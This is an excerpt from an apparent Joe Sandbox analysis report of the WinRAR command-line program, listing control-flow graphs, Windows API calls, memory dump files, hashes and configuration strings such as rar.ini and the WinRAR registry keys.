                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31416524A09A9280FA64CF1AA84097977E1FF49FD4F0A11F6CC2DC77A4DE7CE0428341

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
• String ID:
• API String ID: 552178382-0
• Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
• Instruction ID: 464917b92cd3a970cfefc1e03fd64ca2828e7ae16eef85b2f24cf0a715a8c3ed
• Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
• Instruction Fuzzy Hash: 46314E21E0828386FA74AB25A6193B933D1EF45F84F4450F4EA8DCB2D7DE6DE4068740

Control-flow Graph

APIs
• RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF69A42495D,?,?,?,00007FF69A417E7D), ref: 00007FF69A4247DB
• RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF69A42495D,?,?,?,00007FF69A417E7D), ref: 00007FF69A424831
• ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF69A42495D,?,?,?,00007FF69A417E7D), ref: 00007FF69A424853
• RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF69A42495D,?,?,?,00007FF69A417E7D), ref: 00007FF69A4248A6
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: CloseEnvironmentExpandOpenQueryStringsValue
• String ID: LanguageFolder$Software\WinRAR\General
• API String ID: 1800380464-3408810217
• Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
• Instruction ID: 56402b51eb64172d3fa15cbd6222296f70a7314075cebb24d812214a126e7ddf
• Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
• Instruction Fuzzy Hash: E8319226728A8145EB709F21E8002BA73D1FF85B94F4051B1EE5EC7B99EF6CD145CB00

Control-flow Graph

APIs
• RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A4143D1
• RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A414402
• RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A41440D
• GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A41443E
Strings
Memory Dump Source
• Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
• Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
Similarity
• API ID: CloseFileModuleNameOpenQueryValue
• String ID: AppData$Software\WinRAR\Paths
• API String ID: 3617018055-3415417297
• Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
• Instruction ID: 1a5e37ed2a24bb2be6b81b1624a73f6bd68032a092272e7bd9e7946fbb946afb
• Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
• Instruction Fuzzy Hash: AD116066A1874285EB609F26F8005BA73E0FF96FC4F4451B1EA4E87A55DF3CE054C744

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1715 7ff69a3e7a5b-7ff69a3e7a5e 1716 7ff69a3e7a60-7ff69a3e7a66 1715->1716 1717 7ff69a3e7a68 1715->1717 1716->1717 1718 7ff69a3e7a6b-7ff69a3e7a7c 1716->1718 1717->1718 1719 7ff69a3e7a7e-7ff69a3e7a81 1718->1719 1720 7ff69a3e7aa8 1718->1720 1721 7ff69a3e7a83-7ff69a3e7a86 1719->1721 1722 7ff69a3e7a88-7ff69a3e7a8b 1719->1722 1723 7ff69a3e7aab-7ff69a3e7ab8 1720->1723 1721->1720 1721->1722 1724 7ff69a3e7aa4-7ff69a3e7aa6 1722->1724 1725 7ff69a3e7a8d-7ff69a3e7a90 1722->1725 1726 7ff69a3e7aba-7ff69a3e7abd 1723->1726 1727 7ff69a3e7ac8-7ff69a3e7acb 1723->1727 1724->1723 1725->1720 1728 7ff69a3e7a92-7ff69a3e7a99 1725->1728 1726->1727 1729 7ff69a3e7abf-7ff69a3e7ac6 1726->1729 1730 7ff69a3e7acf-7ff69a3e7ad1 1727->1730 1728->1724 1731 7ff69a3e7a9b-7ff69a3e7aa2 1728->1731 1729->1730 1732 7ff69a3e7ad3-7ff69a3e7ae6 1730->1732 1733 7ff69a3e7b2a-7ff69a3e7bb0 call 7ff69a401d34 call 7ff69a3e3f04 1730->1733 1731->1720 1731->1724 1735 7ff69a3e7b0a-7ff69a3e7b27 1732->1735 1736 7ff69a3e7ae8-7ff69a3e7af2 call 7ff69a3f9be0 1732->1736 1744 7ff69a3e7bb2-7ff69a3e7bba 1733->1744 1745 7ff69a3e7bbc 1733->1745 1735->1733 1739 7ff69a3e7af7-7ff69a3e7b02 1736->1739 1739->1735 1744->1745 1746 7ff69a3e7bbf-7ff69a3e7bc9 1744->1746 1745->1746 1747 7ff69a3e7bcb-7ff69a3e7bd5 call 7ff69a401e1c 1746->1747 1748 7ff69a3e7bda-7ff69a3e7c06 call 7ff69a3eb540 1746->1748 1747->1748 1752 7ff69a3e7c40 1748->1752 1753 7ff69a3e7c08-7ff69a3e7c0f 1748->1753 1755 7ff69a3e7c44-7ff69a3e7c5a call 7ff69a3eaa68 1752->1755 1753->1752 1754 7ff69a3e7c11-7ff69a3e7c14 1753->1754 1754->1752 1756 7ff69a3e7c16-7ff69a3e7c2b 1754->1756 1761 7ff69a3e7c85-7ff69a3e7c97 call 7ff69a3eb540 1755->1761 1762 7ff69a3e7c5c-7ff69a3e7c6a 1755->1762 1756->1755 1758 7ff69a3e7c2d-7ff69a3e7c3e call 7ff69a439b98 
1756->1758 1758->1755 1766 7ff69a3e7c9c-7ff69a3e7c9f 1761->1766 1762->1761 1765 7ff69a3e7c6c-7ff69a3e7c7e call 7ff69a3e8d98 1762->1765 1765->1761 1768 7ff69a3e7ca5-7ff69a3e7cfb call 7ff69a419354 call 7ff69a406378 * 2 1766->1768 1769 7ff69a3e7fa4-7ff69a3e7fbe 1766->1769 1777 7ff69a3e7cfd-7ff69a3e7d10 call 7ff69a3e5414 1768->1777 1778 7ff69a3e7d17-7ff69a3e7d1f 1768->1778 1777->1778 1780 7ff69a3e7de2-7ff69a3e7de6 1778->1780 1781 7ff69a3e7d25-7ff69a3e7d28 1778->1781 1783 7ff69a3e7e4e-7ff69a3e7e68 call 7ff69a419958 1780->1783 1784 7ff69a3e7de8-7ff69a3e7e49 call 7ff69a4198dc 1780->1784 1781->1780 1785 7ff69a3e7d2e-7ff69a3e7d36 1781->1785 1793 7ff69a3e7e8b-7ff69a3e7e8e 1783->1793 1794 7ff69a3e7e6a-7ff69a3e7e84 1783->1794 1784->1783 1786 7ff69a3e7d59-7ff69a3e7d6a call 7ff69a43a444 1785->1786 1787 7ff69a3e7d38-7ff69a3e7d49 call 7ff69a43a444 1785->1787 1801 7ff69a3e7d6c-7ff69a3e7d77 call 7ff69a40cf8c 1786->1801 1802 7ff69a3e7d78-7ff69a3e7dc6 1786->1802 1799 7ff69a3e7d4b-7ff69a3e7d56 call 7ff69a408ae8 1787->1799 1800 7ff69a3e7d57 1787->1800 1797 7ff69a3e7e9f-7ff69a3e7eb8 call 7ff69a3e1204 1793->1797 1798 7ff69a3e7e90-7ff69a3e7e9a call 7ff69a419990 1793->1798 1794->1793 1813 7ff69a3e7ec8-7ff69a3e7ed9 call 7ff69a41941c 1797->1813 1798->1797 1799->1800 1800->1802 1801->1802 1802->1780 1823 7ff69a3e7dc8-7ff69a3e7de1 call 7ff69a3e1314 call 7ff69a43ba34 1802->1823 1817 7ff69a3e7edb-7ff69a3e7f9f call 7ff69a3e1400 call 7ff69a406424 call 7ff69a3eb540 1813->1817 1818 7ff69a3e7eba-7ff69a3e7ec3 call 7ff69a419680 1813->1818 1817->1769 1818->1813 1823->1780
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: H9
                                                                                                                                                                                                                                      • API String ID: 0-2207570329
                                                                                                                                                                                                                                      • Opcode ID: 0388c903026e2033e6aa999372b63832fc175bbcd0170491359c0219acaf1d27
                                                                                                                                                                                                                                      • Instruction ID: ee37f538584d46723babede2b4d44193d558cfd63cf46dc0091cc3d81a0d07fc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0388c903026e2033e6aa999372b63832fc175bbcd0170491359c0219acaf1d27
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42E1A062A08A9286EB20DB25E048BFD37E9EB4574CF6544B9DE4DC3786DF38E954C700

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1858 7ff69a402574-7ff69a40259c 1859 7ff69a4025a5-7ff69a4025a9 1858->1859 1860 7ff69a40259e-7ff69a4025a0 1858->1860 1862 7ff69a4025ab-7ff69a4025b6 GetStdHandle 1859->1862 1863 7ff69a4025ba-7ff69a4025c6 1859->1863 1861 7ff69a40273a-7ff69a402756 1860->1861 1862->1863 1864 7ff69a402619-7ff69a402637 WriteFile 1863->1864 1865 7ff69a4025c8-7ff69a4025cd 1863->1865 1866 7ff69a40263b-7ff69a40263e 1864->1866 1867 7ff69a402644-7ff69a402648 1865->1867 1868 7ff69a4025cf-7ff69a402609 WriteFile 1865->1868 1866->1867 1869 7ff69a402733-7ff69a402737 1866->1869 1867->1869 1870 7ff69a40264e-7ff69a402652 1867->1870 1868->1867 1871 7ff69a40260b-7ff69a402615 1868->1871 1869->1861 1870->1869 1872 7ff69a402658-7ff69a402692 GetLastError call 7ff69a403144 SetLastError 1870->1872 1871->1868 1873 7ff69a402617 1871->1873 1878 7ff69a402694-7ff69a4026a2 1872->1878 1879 7ff69a4026bc-7ff69a4026d0 call 7ff69a3fc95c 1872->1879 1873->1866 1878->1879 1881 7ff69a4026a4-7ff69a4026ab 1878->1881 1884 7ff69a4026d2-7ff69a4026db 1879->1884 1885 7ff69a402721-7ff69a40272e call 7ff69a3fcf14 1879->1885 1881->1879 1883 7ff69a4026ad-7ff69a4026b7 call 7ff69a3fcf34 1881->1883 1883->1879 1884->1863 1887 7ff69a4026e1-7ff69a4026e3 1884->1887 1885->1869 1887->1863 1889 7ff69a4026e9-7ff69a40271c 1887->1889 1889->1863
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFileLastWrite$Handle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3350704910-0
                                                                                                                                                                                                                                      • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                      • Instruction ID: 310930bd5bdd6e0d7f9e3afa22477e6129eb05d6be22262ccc91cfb79f4091ec
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD516C26A1865286EB74DB26E41437A77E0FBA9F84F4401B5DB4EC7AA0CF3CE546C704

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1894 7ff69a401e80-7ff69a401ebb call 7ff69a43a5a0 1897 7ff69a401ebd-7ff69a401ec1 1894->1897 1898 7ff69a401ec8 1894->1898 1897->1898 1899 7ff69a401ec3-7ff69a401ec6 1897->1899 1900 7ff69a401ecb-7ff69a401f57 CreateFileW 1898->1900 1899->1900 1901 7ff69a401fcd-7ff69a401fd1 1900->1901 1902 7ff69a401f59-7ff69a401f76 GetLastError call 7ff69a414534 1900->1902 1903 7ff69a401fd3-7ff69a401fd7 1901->1903 1904 7ff69a401ff7-7ff69a40200f 1901->1904 1912 7ff69a401fba 1902->1912 1913 7ff69a401f78-7ff69a401fb6 CreateFileW GetLastError 1902->1913 1903->1904 1906 7ff69a401fd9-7ff69a401ff1 SetFileTime 1903->1906 1907 7ff69a402011-7ff69a402022 call 7ff69a42a9e8 1904->1907 1908 7ff69a402027-7ff69a40204b call 7ff69a43a610 1904->1908 1906->1904 1907->1908 1916 7ff69a401fbf-7ff69a401fc1 1912->1916 1913->1901 1915 7ff69a401fb8 1913->1915 1915->1916 1916->1901 1917 7ff69a401fc3 1916->1917 1917->1901
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1999340476-0
                                                                                                                                                                                                                                      • Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                                      • Instruction ID: 1e838a7a998f537f91ac168717177cae579310e1869f217dc30f64aa515d71f2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33412472A1869146FB708B28E5057A97AE0EB96FB8F0013B8DE7D836C4DF7DC4458B40

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: swprintf
                                                                                                                                                                                                                                      • String ID: rar.ini$switches=$switches_%ls=
                                                                                                                                                                                                                                      • API String ID: 233258989-2235180025
                                                                                                                                                                                                                                      • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                      • Instruction ID: d65434f87ce9e41e2ea1a031717647a0f9f89bd8581078a3c80b31026db5e705
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27418F21A1868282FA24DF21D8111B933E0EF54BA4F4055F9EA9EC36D6EF7CD946D300

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1950873847.00007FF69A3E0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951046976.00007FF69A468000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951084241.00007FF69A469000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A46A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A474000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A47E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951128943.00007FF69A486000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951563373.00007FF69A488000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000041.00000002.1951623397.00007FF69A48E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_65_2_7ff69a3e0000_rar.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                                                                                                                                                                                                      • String ID: rar.lng
                                                                                                                                                                                                                                      • API String ID: 553376247-2410228151
                                                                                                                                                                                                                                      • Opcode ID: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
                                                                                                                                                                                                                                      • Instruction ID: c8c53bb46efb41f8b8a6714f325f7eca10bb8ebd94c5b91e2083f78486053e9a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56419221E1C68246FB34EB21A4112B973E0DFA1F94F5810F9E91EC72D7CE2DE4158751

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SHGetMalloc.SHELL32(?,00000800,?,00007FF69A414432,?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A4140C4
                                                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A4140DF
                                                                                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32 ref: 00007FF69A4140F1
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A403458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF69A41413F,?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A4034A0
                                                                                                                                                                                                                                        • Part of subcall function 00007FF69A403458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF69A41413F,?,?,?,?,00000800,00000000,00000000,00007FF69A4138CB,?,?,?,00007FF69A4141EC), ref: 00007FF69A4034D5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000041.00000002.1950910064.00007FF69A3E1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF69A3E0000, based on PE: true
